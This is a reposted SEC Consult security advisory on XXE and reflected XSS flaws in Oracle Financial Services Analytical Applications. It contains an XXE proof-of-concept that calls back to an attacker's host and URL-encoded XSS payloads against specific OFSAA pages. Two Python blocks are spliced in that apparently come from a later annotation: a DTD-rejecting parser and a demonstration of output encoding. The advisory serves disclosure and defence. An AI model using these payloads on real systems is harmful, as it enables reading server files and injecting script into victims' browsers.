Oracle Financial Services Analytical Applications 7.3.5.x / 8.0.x XXE Injection / XSS
Posted Jan 24, 2018
Authored by Samandeep Singh, Mohammad Shah Bin Mohammad Esa | Site sec-consult.com

Oracle Financial Services Analytical Applications versions 7.3.5.x and 8.0.x suffer from XML external entity injection and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, xxe
advisories | CVE-2018-2660, CVE-2018-2661
SHA-256 | 596ba7a1bde4935da9df89c58e1d05d2e8ba24cba2ef3cb2156029511e53d6b4

SEC Consult Vulnerability Lab Security Advisory < 20180123-0 >
=======================================================================
title: XXE & Reflected XSS
product: Oracle Financial Services Analytical Applications
vulnerable version: 7.3.5.x, 8.0.x
fixed version: Oracle CPU January 2018
CVE number: CVE-2018-2660, CVE-2018-2661
impact: High
homepage: http://www.oracle.com/us/products/applications/financial-services/analytical-applications/index.html
found: 2017-06-15
by: Mohammad Shah Bin Mohammad Esa, Samandeep Singh
(Office Singapore)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Oracle is the unchallenged leader in Financial Services, with an
integrated, best-in-class, end-to-end solution of intelligent software
and powerful hardware designed to meet every financial service need."

Source: http://www.oracle.com/us/products/applications/financial-services/analytical-applications/index.html


Business recommendation:
------------------------
By exploiting the XXE vulnerability, an attacker can gain read access to the
filesystem of the server running the OFSAA web application and thus obtain
sensitive information from that system. It is also possible to bypass input
validation checks in order to inject JavaScript code.

SEC Consult recommends installing the patched version immediately.
Furthermore, a thorough security review should be performed by security
professionals to identify potential further security issues.


Vulnerability overview/description:
-----------------------------------
1) XML eXternal Entity (XXE) Injection (CVE-2018-2660)
The web application allows users to import XML files. An attacker can import a
specially crafted XML file and exploit the XXE vulnerability within the application.

2) Reflected Cross Site Scripting (CVE-2018-2661)
This vulnerability allows an unauthenticated attacker to inject malicious
client-side script, which is executed in the browser of a user who visits
the manipulated URL.


Proof of concept:
-----------------
1) XML External Entity Injection (XXE) (CVE-2018-2660)
For example, importing the following XML code via the "Business Model Upload"
function causes the server to make a connection request to the attacker's system.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://[IP:port]/" >]><foo>&xxe;</foo>

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the
techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
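The fix on the parsing side is to refuse DTD processing for uploaded documents before any entity can be defined. The following is an added example (not code from the advisory or from OFSAA) using Python's stdlib expat bindings; the two sample uploads are constructed, and the listener address in the XXE sample is a placeholder:

```python
import xml.parsers.expat

# Constructed sample with the same shape as the advisory's PoC document;
# "attacker.invalid" is a placeholder, not a real listener.
XXE_UPLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://attacker.invalid:8080/" >]><foo>&xxe;</foo>"""

# Constructed benign upload: no DOCTYPE, so there is nothing to reject.
BENIGN_UPLOAD = b"""<?xml version="1.0"?><model><entity name="Loan"/></model>"""


class DtdNotAllowed(ValueError):
    """Raised when an upload carries a DOCTYPE or references an external entity."""


def parse_model_upload(data: bytes) -> list[str]:
    """Parse an uploaded XML document with DTD processing refused.

    Returns the element names seen, in document order. Any DOCTYPE
    declaration aborts the parse before an entity can be defined; an
    external entity reference aborts it as a second line of defence.
    """
    names: list[str] = []
    parser = xml.parsers.expat.ParserCreate()
    # Never expand parameter entities (this covers external DTD subsets).
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed(f"DOCTYPE {name!r} is not permitted in uploads")

    def reject_external_entity(context, base, sysid, pubid):
        raise DtdNotAllowed(f"external entity {sysid!r} is not permitted")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external_entity
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(data, True)  # exceptions raised in handlers propagate here
    return names


def is_acceptable_upload(data: bytes) -> bool:
    """True if the document parses without touching a DTD, otherwise False."""
    try:
        parse_model_upload(data)
    except (DtdNotAllowed, xml.parsers.expat.ExpatError):
        return False
    return True
```

The same policy in a Java application is the `disallow-doctype-decl` feature on the parser factory; the effect is identical: the upload is rejected at the DOCTYPE, so no entity is ever resolved.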


2) Reflected Cross Site Scripting (CVE-2018-2661)
The following parameters have been found to be vulnerable to reflected
cross site scripting attacks; many more vulnerable parameters exist.

The following payload shows a simple alert message box:
URL : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle=
METHOD : GET
PAYLOAD :
winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E

URL : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp?
url=fetchErrorMessages.action&infodom=OCBCOFSAASG&formCode=summarypage&errorMessage={62}~
METHOD : GET
PAYLOAD : errorMessage={62}~%27;alert%0a(0);//&aType=DeleteConfirm
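Both payloads work because the reflected value is written into a context it can break out of: `winTitle` closes the `<title>` element, and `errorMessage` closes a single-quoted JavaScript string. The following is an added example (not code from the advisory or from OFSAA) that decodes the two PoC values exactly as the server would receive them and contrasts the vulnerable concatenation with context-aware output encoding; the template fragments are assumptions about the page structure, not OFSAA's actual JSPs:

```python
import html
import json
from urllib.parse import unquote

# The advisory's PoC values, URL-decoded as a servlet would see them.
WINTITLE_PAYLOAD = unquote(
    "a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E"
)
ERRORMESSAGE_PAYLOAD = unquote("{62}~%27;alert%0a(0);//")


def render_title_vulnerable(win_title: str) -> str:
    """Assumed vulnerable pattern: raw concatenation into the <title> element."""
    return f"<title>{win_title}</title>"


def render_title(win_title: str) -> str:
    """HTML element context: html.escape turns '<' into '&lt;', so the value can
    neither close </title> nor open an <img> tag."""
    return f"<title>{html.escape(win_title, quote=True)}</title>"


def render_js_string_vulnerable(error_message: str) -> str:
    """Assumed vulnerable pattern: raw concatenation into a single-quoted JS string."""
    return f"<script>var errorMessage = '{error_message}';</script>"


def render_js_string(error_message: str) -> str:
    """JavaScript string context: json.dumps yields a valid double-quoted JS
    literal with quotes, backslashes, newlines and non-ASCII escaped.
    '</' is escaped on top so the HTML parser can never see a </script> tag
    inside the literal."""
    literal = json.dumps(error_message).replace("</", "<\\/")
    return f"<script>var errorMessage = {literal};</script>"
```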


Vulnerable / tested versions:
-----------------------------
The following version was tested; it was the most recent one when the
vulnerabilities were discovered:

* Oracle Financial Services Analytical Applications 8.0.4.0.0

According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU
January 2018.


Vendor contact timeline:
------------------------
2017-09-11: Contacting vendor through encrypted email (secalert_us@oracle.com)
2017-09-20: Vendor requested to postpone the release date
2018-01-13: Vendor informed that the Critical Patch Update including fixes
for the reported issues would be released on 2018-01-16.
CVE-2018-2660 & CVE-2018-2661 were assigned to the issues
2018-01-23: Public disclosure of advisory


Solution:
---------
Apply the patches from the January 2018 Critical Patch Update:
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF M. Shah / @2018
